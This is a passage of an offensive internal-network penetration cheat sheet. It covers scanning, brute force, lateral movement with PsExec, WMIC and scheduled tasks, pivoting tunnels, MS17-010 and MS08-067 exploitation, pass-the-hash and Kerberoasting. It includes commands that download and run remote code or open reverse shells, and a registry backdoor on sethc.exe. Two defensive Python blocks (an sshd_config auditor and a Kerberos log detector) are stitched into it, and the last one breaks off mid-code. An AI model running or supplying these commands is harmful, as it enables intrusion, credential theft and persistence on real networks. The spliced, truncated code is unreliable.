meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24

Probing services and ports

Common ports
Service        Port
Mssql          1433
SMB            445
WMI            135
winrm          5985
rdp            3389
ssh            22
oracle         1521
mysql          3306
redis          6379
postgresql     5432
ldap           389
smtp           25
pop3           110
imap           143
exchange       443
vnc            5900
ftp            21
rsync          873
mongodb        27017
telnet         23
svn            3690
java rmi       1099
couchdb        5984
pcanywhere     5632
web            80-90, 8000-10000, 7001, 9200, 9300

Powershell

Powersploit
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 -T 4 -Ports '1-65535' -oA C:\TEMP.txt"
Nishang
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"

Drop -ScanPort to only probe for live hosts

SMB

https://github.com/ShawnDEvans/smbmap
MSF
#use auxiliary/scanner/smb/smb_version    (find hosts with 139/445 open)
#use auxiliary/scanner/smb/smb_login    (brute force)
NMAP
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168.1.119
CMD
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445

Linux Samba service

Usually port 139; connect with weak credentials
>smbclient -L 192.168.0.110
>smbclient '\\192.168.0.110\IPC$'
#use exploit/linux/samba/is_known_pipename

MSF

Ports
#use auxiliary/scanner/portscan/tcp
#use auxiliary/scanner/portscan/ack
Services
#use auxiliary/scanner/ftp/ftp_version    (hosts running FTP)
#use auxiliary/scanner/ftp/anonymous    (FTP servers allowing anonymous login)
#use auxiliary/scanner/ftp/ftp_login    (FTP brute force)
#use auxiliary/scanner/http/http_version    (hosts running HTTP)
#use auxiliary/scanner/smb/smb_version    (hosts running SMB)
#use auxiliary/scanner/smb/smb_enumshares    (SMB shares allowing anonymous access)
#use auxiliary/scanner/smb/smb_login    (SMB brute force)
#use auxiliary/scanner/ssh/ssh_version    (hosts running SSH)
#use auxiliary/scanner/ssh/ssh_login    (SSH brute force)
#use auxiliary/scanner/telnet/telnet_version    (hosts running Telnet)
#use auxiliary/scanner/telnet/telnet_login    (Telnet brute force)
#use auxiliary/scanner/mysql/mysql_version    (hosts running MySQL)
#use auxiliary/scanner/mysql/mysql_login    (MySQL brute force)
#use auxiliary/scanner/mssql/mssql_ping    (hosts running SQL Server)
#use auxiliary/scanner/mssql/mssql_login    (MSSQL brute force)
#use auxiliary/scanner/postgres/postgres_version    (hosts running PostgreSQL)
#use auxiliary/scanner/postgres/postgres_login    (PostgreSQL brute force)
#use auxiliary/scanner/oracle/tnslsnr_version    (hosts running Oracle)
#use auxiliary/admin/oracle/oracle_login    (Oracle brute force)
#use auxiliary/scanner/http/title    (scan HTTP titles)
#use auxiliary/scanner/rdp/rdp_scanner    (hosts running RDP)
#use auxiliary/scanner/http/webdav_scanner
#use auxiliary/scanner/http/http_put    (hosts with WebDAV enabled)
#use auxiliary/scanner/smb/smb_ms17_010    (hosts vulnerable to MS17-010)
#use auxiliary/scanner/http/zabbix_login    (Zabbix brute force)
#use auxiliary/scanner/http/axis_login    (Axis brute force)
#use auxiliary/scanner/redis/redis_login    (Redis brute force)

Nc

>nc -znv 192.168.0.98 1-65535


>nc -v -w 1 192.168.0.110 -z 1-1000
>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done

Masscan

$sudo apt-get install clang git gcc make libpcap-dev
$git clone https://github.com/robertdavidgraham/masscan
$cd masscan
$make
>masscan -p80,3389,1-65535 192.168.0.0/24


PTScan

Friendly identification of web services
https://github.com/phantom0301/PTscan/blob/master/PTscan.py
>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n (no ping)] [-b (enable banner scan)] [-r (IP lookup)]
Web ports: 80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001

CobaltStrike + K8 Aggressor

https://github.com/k8gege/Aggressor
Live hosts
beacon>Cscan 192.168.0.0/24 OnlinePC

MS17010
beacon>Cscan 192.168.0.0/24 MS17010

Operating system information
beacon>Cscan 192.168.0.0/24 Osscan

Internal web banner and title scan
beacon>Cscan 192.168.0.0/24 WebScan

FTP brute force
Upload the credential files user.txt and pass.txt to the beacon directory (beacon>pwd)
beacon>Cscan 192.168.0.0/24 FtpScan

WMI brute force of Windows accounts
Upload the credential files user.txt and pass.txt to the beacon directory (beacon>pwd)
beacon>Cscan 192.168.0.0/24 WmiScan

Cisco device scan
beacon>Cscan 192.168.0.0/24 CiscoScan

Enumerate shares
beacon> EnumShare

Enumerate SQL Server databases
beacon> EnumMSSQL

Command execution, IPC and scheduled tasks

Establish a connection
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
List connections
>net use
List files
>dir \\192.168.1.2\c$
Check the system time
>net time \\192.168.1.2
Upload a file
>copy 1.exe \\192.168.1.2\c$
Download a file
>copy \\192.168.1.2\c$\1.exe 1.exe
Batch IPC
@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd
:end
exit

AT

Schtasks
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
>copy 1.exe \\192.168.1.2\c$
>net time \\192.168.1.2
>at \\192.168.1.2 1:00AM c:\1.exe
>at \\192.168.1.2 1:00AM cmd.exe /c "ipconfig >c:/1.txt"
>type \\192.168.1.2\c$\1.txt
List scheduled tasks
>at \\192.168.1.2
Delete a scheduled task
>at \\192.168.1.2 <task ID> /delete
Batch lateral execution
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>schtasks /query /fo LIST /v    (list scheduled tasks)
Upload a file
>copy ok.exe \\192.168.0.55\c$\windows\temp
Create a scheduled task remotely
>schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
Query the remotely created task
>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"
Run the remote task immediately
>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"
Delete the scheduled task
>schtasks /Delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"
Delete the IPC connection
>net use \\192.168.0.55\ipc$ /del /y
Batch lateral execution
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del

WMIC

>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>copy ok.exe \\192.168.0.55\c$\windows\temp
>wmic /NODE:"192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
>del \\192.168.0.55\c$\windows\temp\ok.exe /F
>net use \\192.168.0.55\c$ /del

Quickly locating machines where domain admins have logged in

>psexec -accepteula @ips.txt -u admin -p pass@123 -c 1.bat
#contents of 1.bat
tasklist /v | find "<domain admin name>"

@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
for /F "eol=#" %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt
:end
exit

Adding routes in MSF

# route add <internal NIC IP> <netmask> <session id>
# route list
&
Meterpreter>run get_local_subnets    (show the subnets, then add the route)
# run autoroute -s <internal NIC IP>/24
# run autoroute -p    (show the routing table)
&
Meterpreter>run post/multi/manage/autoroute

MSF named pipe listener

On the machine where a meterpreter session already exists, configure a pipe listener
meterpreter > pivot add -t pipe -l <compromised IP> -n bgpipe -a x86 -p windows
Generate the payload
>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=<compromised IP> PIPENAME=bgpipe -f exe -o pipe.exe

Proxies

SSH

Forward proxy
SSH dynamic forwarding establishes a forward, encrypted SOCKS channel. On the target with internet access, edit the following and restart the ssh service:
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes    (allow TCP forwarding)
GatewayPorts yes    (allow remote hosts to connect to locally forwarded ports)
TCPKeepAlive yes    (keep TCP sessions alive)
PasswordAuthentication yes    (password authentication)
On the external attacking machine run
>ssh -C -f -N -g -D 0.0.0.0:12138 root@<target external IP> -p 22
Set a global proxy in MSF, or use other software
>setg proxies socks5:0.0.0.0:12138
Hosts in the isolated segment can then be attacked.

Reverse proxy
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes    (allow TCP forwarding)
GatewayPorts yes    (allow remote hosts to connect to locally forwarded ports)
TCPKeepAlive yes    (keep TCP sessions alive)
PasswordAuthentication yes    (password authentication)
ClientAliveInterval    (set to 30-60 to keep the connection alive)
ClientAliveCountMax    (uncomment; the number of unanswered keepalive requests before the connection is dropped)
192.168.0.107 is the external attacking machine. Run on the internal target:

>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107

Run on the attacking machine
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107

The tunnel is established; configure the proxy software to use <attacking machine external IP>:12345 to reach the internal network.
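Both the forward and the reverse setup above depend on the same handful of sshd_config directives, so a hardening review of a Linux host should read them the way sshd does. The following Python is an added example (not from the original post) that parses sshd_config with sshd's first-match-wins rule, honours Match blocks, and reports the settings that let any SSH login turn the host into a SOCKS pivot; both config texts are constructed samples.

```python
"""Audit sshd_config for the forwarding settings the post switches on.

Added example, not part of the original post. Parses the file the way sshd
reads it (first occurrence of a directive wins; directives after a Match line
apply only to that condition) and reports the settings that let any SSH login
turn the host into a SOCKS pivot. Both config texts are constructed samples.
"""

# OpenSSH documented defaults for the directives we care about.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "passwordauthentication": "yes",
    "tcpkeepalive": "yes",
    "clientaliveinterval": "0",
    "clientalivecountmax": "3",
}

# Constructed sample: what the edits described above leave behind.
PIVOT_CONFIG = """\
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
ClientAliveInterval 30
ClientAliveCountMax 3
"""

# Constructed sample: a restrictive baseline with one scoped exception.
HARDENED_CONFIG = """\
AllowTcpForwarding no
GatewayPorts no
PasswordAuthentication no
PermitRootLogin no
Match User backup
    AllowTcpForwarding yes
"""


def parse_sshd_config(text):
    """Return (global_settings, match_settings) with lower-cased keys.

    Global settings keep the first value seen, as sshd does. Anything after a
    Match line is collected under that Match condition instead.
    """
    global_cfg = {}
    match_cfg = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # sshd accepts "Key value" and "Key=value"; normalise to the first form.
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = value
            match_cfg.setdefault(current, {})
            continue
        target = global_cfg if current is None else match_cfg[current]
        target.setdefault(key, value)
    return global_cfg, match_cfg


def effective(global_cfg, key):
    """Global value of a directive, falling back to the sshd default."""
    return global_cfg.get(key, DEFAULTS.get(key, "")).lower()


def audit_forwarding(text):
    """List the findings that make this sshd usable as a pivot."""
    global_cfg, match_cfg = parse_sshd_config(text)
    findings = []
    if effective(global_cfg, "gatewayports") == "yes":
        findings.append("GatewayPorts yes: remote forwards (-R) bind on all "
                        "interfaces, so tunnelled ports are reachable from the network")
    if effective(global_cfg, "allowtcpforwarding") == "yes":
        findings.append("AllowTcpForwarding yes: any SSH login can open -D/-L/-R tunnels")
        if effective(global_cfg, "passwordauthentication") == "yes":
            findings.append("PasswordAuthentication yes with forwarding enabled: "
                            "a guessed password is enough to pivot through this host")
    for condition, cfg in match_cfg.items():
        if cfg.get("allowtcpforwarding", "").lower() == "yes":
            findings.append(f"forwarding enabled conditionally for 'Match {condition}'")
    return findings


if __name__ == "__main__":
    for name, cfg in (("pivot", PIVOT_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_forwarding(cfg))
```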


SSH tunnel + RC4 double encryption
Generate the payload
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF settings
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446

Public SSH tunnel + local MSF
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '\x00' LHOST=<public IP> LPORT=12138 -f exe -o /var/www/html/1.exe
The handler listens on <local IP>:12138
SSH forwarding
>ssh -N -R 12138:<local internal IP>:12138 root@<public IP>

socks4a

#use auxiliary/server/socks4a
#set srvhost 0.0.0.0
#set srvport 1080
#run
For multi-layer networks, configure another port
Win: Proxifier & Sockscap64
Linux: proxychains & browser
&
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > bg
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit

socks5

#use auxiliary/server/socks5
#set srvhost 0.0.0.0
#set srvport 1080
#run


Browser

Web-based socks5

reGeorg
https://github.com/sensepost/reGeorg
>python reGeorgSocksProxy.py -u http://<target>/tunnel.aspx -l <external IP> -p 10080
Open Proxifier and change the port to the one specified in the script, 10080

or proxychains
#vim /etc/proxychains.conf
uncomment dynamic_chain
>add socks5 127.0.0.1 10080

or MSF
>setg proxies socks5:<external IP>:10080
>setg ReverseAllowProxy true    (allow reverse connections through the proxy)


Neo-reGeorg

Step 1. Set a password, generate tunnel.(aspx|ashx|jsp|jspx|php) and upload it to the web server
$ python3 neoreg.py generate -k password

Disguised page

$ python3 neoreg.py generate -k <you_password> --file 404.html
Step 2. Use neoreg.py to connect to the web server and set up a local socks proxy
$ python3 neoreg.py -k password -u http://xx/tunnel.php
$ python3 neoreg.py -k <you_password> -u <server_url> --skip
Start the proxy
$ python neoreg.py -k <you_password> -l <external IP> -p 10081 -u http://xx/neo-tunnel.aspx


ABPTTS port forwarding

https://github.com/nccgroup/ABPTTS
Port forwarding
>python abpttsfactory.py -o webshell    generate the shell
Upload the script generated under ./webshell to the target
>python abpttsclient.py -c webshell/config.txt -u "http://<target site>/trans.aspx" -f <attack host IP>:12345/<target IP>:3389

ABPTTS: forwarding a port of another internal host

>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389

To forward several hosts or several ports

>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22

SSH proxy for the first-level subnet
Requires a Linux target on which you already have privileges
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22
>ssh -p 222 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107

Then configure proxychains.

SSH proxy for the second-level subnet

Requires web privileges on a target: with web privileges on one first-level internal host, forward the internal web server out and upload the ABPTTS shell to it
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107/qq.aspx -f 192.168.0.107:222/10.1.1.106:22
An SSH connection to 192.168.0.107:222 reaches the second-level network.

Reverse shell to msf
Generate a bind-type payload on kali
>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell
Run it on the second-level Linux host (no outbound access) and forward its port 12138 out through ABPTTS
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138
Msf then connects to local port 13128.
Tunna forwarding

>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 -v


Earthworm

Forward (target has a public IP):

>ew -s ssocksd -l 888
Connect sockscap64 to the target's public IP, port 888

Reverse socks5 (target has no public IP):
External attack host:
>ew -s rcsocks -l 1008 -e 888
-l is the port the socks client connects to; -e is the port over which the target and the VPS communicate.
Target:
>ew -s rssocks -d <external IP> -e 1008
Connect sockscap64 to the attack host's public IP, port 1008

Two-level environment (A has external access, B is internal without it):
Target B:
>ew -s ssocksd -l 888
Target A:
>ew -s lcx_tran -l 1080 -f <target B> -g 888
Connect Sockscap64 to the target's public IP, port 1080

Two-level environment (A has no external access, B is internal without it):

External attack host:
>ew -s lcx_listen -l 10800 -e 888
Target B:
>ew -s ssocksd -l 999
Target A:
>ew -s lcx_slave -d <external IP> -e 888 -f <target B> -g 999
Connect Sockscap64 to the attack host's public IP, port 10800 (the -l port of lcx_listen; the -e/-g ports of lcx_slave must match lcx_listen and ssocksd)

Three-level environment (A has no external access; B is internal, reaches A but not the Internet; C reaches B):
External attack host:
>ew -s rcsocks -l 1008 -e 888
Target A:
>ew -s lcx_slave -d <external attack host> -e 888 -f <target B> -g 999
Target B:
>ew -s lcx_listen -l 999 -e 777
Target C:
>ew -s rssocks -d <target B> -e 777
Connect Sockscap64 to the attack host's public IP, port 1008

Frp

https://github.com/fatedier/frp/releases/
Prerequisite: the target host can reach the Internet, and you own a public IP.
Configure frps.ini on the external attack server:
[common]
bind_port=8080
Target client (frpc.ini):
[common]
server_addr=<server public IP>
server_port=8080
[socks5]
type=tcp
remote_port=12345
plugin=socks5
use_encryption=true
use_compression=true
The last two lines enable encryption and compression, which can evade traffic-analysis devices.
Upload frpc.exe and frpc.ini to the target server and run frpc.exe directly (in practice it may report that the config file cannot be found; then pass the path with -c: frpc.exe -c <path>). The file name and config name can be changed to avoid attention.
On the public VPS run
./frps -c frps.ini
On the target run
./frpc -c frpc.ini

Set global variables in MSF

>setg proxies <public IP>:12345
>setg ReverseAllowProxy true    allow reverse connections through the proxy

Ending the attack
tasklist
taskkill /pid <PID> -t -f

SSF

https://github.com/securesocketfunneling/ssf/releases

Forward socks proxy

On the border host:
>ssfd.exe -p 1080
On linux:
./ssfd -p 1080

On the attack host:
>ssf.exe -D 12138 -p 1080 192.168.0.98 (border host IP)

Configure proxychains or proxifier locally

Reverse socks proxy

On the attack host:
>ssfd.exe -p 1080

On the internal host:
>ssf.exe -F 12138 -p 1080 192.168.0.106 (attack host IP)

Multi-level chaining

On the deep internal host:
>ssfd.exe -p 1080 -c config.json
Add this field to the JSON file:
"circuit": [
  {"host": "<relay A IP>", "port":"1080"},
  {"host": "<relay B IP>", "port":"1080"}
],
On every relay host:
>ssfd.exe -p 1080 -c config.json
On the border host:
>ssf.exe -c config.json -p 1080 <deep internal host IP> -X 12138
On the border host:
>nc.exe 127.0.0.1 12138
This gives a cmd shell on the deep internal host.

Reverse shell

On the attack host:
>ssfd.exe -p 1080 -c config.json

On the internal host:

On the attack host:
>nc 127.0.0.1 12138

Shadowsocks

https://github.com/shadowsocks/libQtShadowsocks/releases/download/v2.0.2/shadowsocks-libqss-v2.0.2-win64.7z
On the target create a config file 1.json with the content
{"server":"0.0.0.0","server_port":13337,"local_address":"127.0.0.1","local_port":1080,"password":"123456","timeout":300,"method":"aes-256-cfb","fast_open":false,"workers": 1}
Run
>shadowsocks-libqss.exe -c 1.json -S
Attack-host configuration

Point the browser or other attack software at proxy 127.0.0.1:1080 (the software must support http(s)/socks5)



Goproxy

https://github.com/snail007/goproxy/releases
On the target run
>proxy.exe socks -t tcp -p "0.0.0.0:13337"

Configure Proxifier on the attack host

Chisel

https://github.com/jpillora/chisel/releases
Listen on the attack host
>chisel.exe server -p 12138 --reverse

On the target run
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346

On the target run
>chisel.exe server -p 12346 --socks5

On the attack host run
>chisel.exe client 127.0.0.1:12345 socks

Once the tunnel is established, the attack host opens local port 1080, which can then be used.



Proxy software

Sockscap64
Proxifier
Proxychains
#vim /etc/proxychains.conf
Uncomment dynamic_chain
>add: socks4 127.0.0.1 1080
#cp /usr/lib/proxychains3/proxyresolv /usr/bin

Ngrok tunneling

https://ngrok.com/
https://www.ngrok.cc/
Download ngrok
#ngrok authtoken <auth token>
#ngrok http 8080
#ngrok tcp 8888

MS17-010

Scan
#use auxiliary/scanner/smb/smb_ms17_010
#set rhosts 192.168.1.0/24
&
#nmap -sT -p 445,139 --open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
Attack
#use exploit/windows/smb/ms17_010_eternalblue    prone to blue screens
#set payload windows/x64/meterpreter/reverse_tcp
#use auxiliary/admin/smb/ms17_010_command
#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f

MS08_067
#nmap -sT -p 445,139 --open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
#use exploit/windows/smb/ms08_067_netapi
#set payload windows/meterpreter/reverse_tcp

CVE-2019-0708

Attacking MySQL databases

#use auxiliary/scanner/mysql/mysql_version    host discovery
#use auxiliary/scanner/mysql/mysql_login    MySQL brute force
#use exploit/multi/mysql/mysql_udf_payload    UDF privilege escalation
#use exploit/windows/mysql/mysql_mof    MOF privilege escalation
#use auxiliary/admin/mysql/mysql_sql    execute commands

Attacking MSSQL databases

>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"    list MSSQL hosts in the domain
https://github.com/NetSPI/PowerUpSQL
>Get-SQLInstanceLocal          # find local SQL Server instances
>Get-SQLInstanceDomain         # find SQL Server instances in the domain
>Get-SQLInstanceBroadcast      # find workgroup SQL Server instances
>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}    workgroup MSSQL brute force
>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}
>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw -Verbose
>$Targets    domain MSSQL brute force
Brute-forcing MSSQL with a Nishang script
>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess
#use auxiliary/scanner/mssql/mssql_login    brute-force hosts
#use auxiliary/admin/mssql/mssql_exec    invoke cmd
#use auxiliary/admin/mssql/mssql_sql    execute SQL statements
#use exploit/windows/mssql/mssql_payload    get a session on the MSSQL host
http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1
Import the nishang script that executes commands through MSSQL
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')
>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin    returns a powershell
#use auxiliary/scanner/mssql/mssql_hashdump    dump MSSQL password hashes
Server NTLM hash known, MSSQL account and password unknown
Hash injection + socks to connect to MSSQL without a password
>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"
Add SSMS.exe to sockscap and launch it
Command-line sqltool
https://github.com/uknowsec/SharpSQLTools

Payload for isolated hosts

An isolated host usually has no bidirectional route to the attack host, so set the payload to bind and let the target listen.
>set payload windows/meterpreter/bind_tcp
>set RHOST <isolated host IP>


Brute forcing

Hydra

Options: -l a single user name, -p a single password, -L user name list, -P password list, -s port, -o output file
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10

Medusa

Options: -h target name or IP, -H target list, -u user name, -U user name list, -p password, -P password list, -f stop after the first success, -M service module, -t threads, -n port, -e ns try an empty password and a password equal to the user name
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql


Domain brute forcing
Kerbrute

https://github.com/ropnop/kerbrute
User enumeration
>kerbrute_windows_amd64.exe userenum -d zone.com username.txt

Password spraying
>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password

Password brute force
This generates log entries
>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name

Combination brute force
Format is username:password
>kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt

DomainPasswordSpray
https://github.com/dafthack/DomainPasswordSpray
Collects accounts automatically and sprays a password
>Invoke-DomainPasswordSpray -Password pass

Combination brute force
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -OutFile result.txt
This generates log entries
Single password
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password

Equation Group toolkit: no session produced in the internal network

Use msfvenom to generate an x64 or x86 dll and replace the x64.dll or x86.dll shipped with the tool.
windows server 2008: generate x64.dll with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dll
msf configuration
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
Replace the tool's x64.dll with this one. After that only the target IP needs changing to obtain a session.
windows server 2003: generate x86.dll with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dll
msf configuration
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
Use the ms17_010_command module to run a system command that adds a user to the administrators group, then set SMBPass and SMBUser to establish a Windows-accessible named pipe.


Kerberoasting
https://github.com/nidem/kerberoast

SPN discovery

cmd

>setspn -T <domain> -Q */*

Powershell

https://github.com/PyroTek3/PowerShell-AD-Recon

Powerview
>Get-NetComputer -SPN termsrv*
>Get-NetUser -SPN

>Import-Module .\GetUserSPNs.ps1
Empire
>usemodule situational_awareness/network/get_spn

Requesting tickets

>Add-Type -AssemblyName System.IdentityModel
>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"
&
>kerberos::ask /target:SPN

Exporting tickets

mimikatz
>kerberos::list /export

Cracking the password

>python tgsrepcrack.py word.txt file.kirbi
https://github.com/leechristensen/tgscrack
>python extractServiceTicketParts.py file.kirbi
>tgscrack.exe -hashfile hash.txt -wordlist word.txt

Rewriting tickets

>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512
Inject into memory
>kerberos::ptt new.kirbi

GetUserSPNs

https://github.com/SecureAuthCorp/impacket
Request the TGS
>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y
Crack
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt

ASREPRoasting

Possible when a user has Kerberos pre-authentication disabled

>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com

Or use Powerview together with https://github.com/gold1029/ASREPRoast
Find domain users that do not require Kerberos pre-authentication

>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

>Get-ASREPHash -UserName y -Domain zone.com -Verbose

Crack the RC4-HMAC AS-REP
>john hash.txt --wordlist=wordlist.txt
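Added example (not from the original post): the detection side of the domain brute-forcing, Kerberoasting and ASREPRoasting sections above, as logic run over constructed Windows security events 4768, 4769 and 4771. Field names follow the event schema; every value is made up.

```python
"""Detect Kerberoasting, AS-REP roasting and password spraying from
Windows security events 4769, 4768 and 4771.
Added example, not part of the original post; events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# RC4-HMAC ticket encryption types. Current clients negotiate AES (0x11/0x12),
# so an RC4 service ticket for a user-owned SPN is the classic roasting sign.
RC4_ETYPES = {"0x17", "0x18"}


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def kerberoast_candidates(events):
    """4769: successfully issued RC4 service ticket whose SPN belongs to a
    user account (not a machine account ending in $, not krbtgt)."""
    hits = []
    for e in events:
        if e["id"] != 4769 or e["status"] != "0x0":
            continue
        svc = e["service"]
        if e["etype"] in RC4_ETYPES and not svc.endswith("$") and svc.lower() != "krbtgt":
            hits.append((e["ip"], e["account"], svc))
    return hits


def asrep_roast_candidates(events):
    """4768 with Pre-Authentication Type 0: the KDC issued an AS-REP without
    pre-authentication, the condition ASREPRoasting depends on."""
    return [(e["ip"], e["account"]) for e in events
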